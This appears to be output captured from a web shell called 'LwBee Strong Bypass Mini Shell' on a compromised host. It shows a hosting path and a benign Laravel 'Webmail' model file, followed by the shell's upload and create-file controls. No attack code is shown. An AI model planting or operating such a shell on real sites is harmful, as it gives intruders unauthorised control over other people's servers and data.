/home/storage/f/3f/a5/aloic1/public_html/core/app/Models/Webmail.php
<?php

namespace App\Models;

use Illuminate\Database\Eloquent\Factories\HasFactory;
use Illuminate\Database\Eloquent\Model;

class Webmail extends Model
{
    use HasFactory;

    public function webmailsGroup()
    {
        return $this->belongsTo('App\Models\WebmailsGroup', 'group_id')->orderby('id', 'asc');
    }

    //Relation to files
    public function files()
    {
        return $this->hasMany('App\Models\WebmailsFile', 'webmail_id')->orderby('id', 'asc');
    }
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File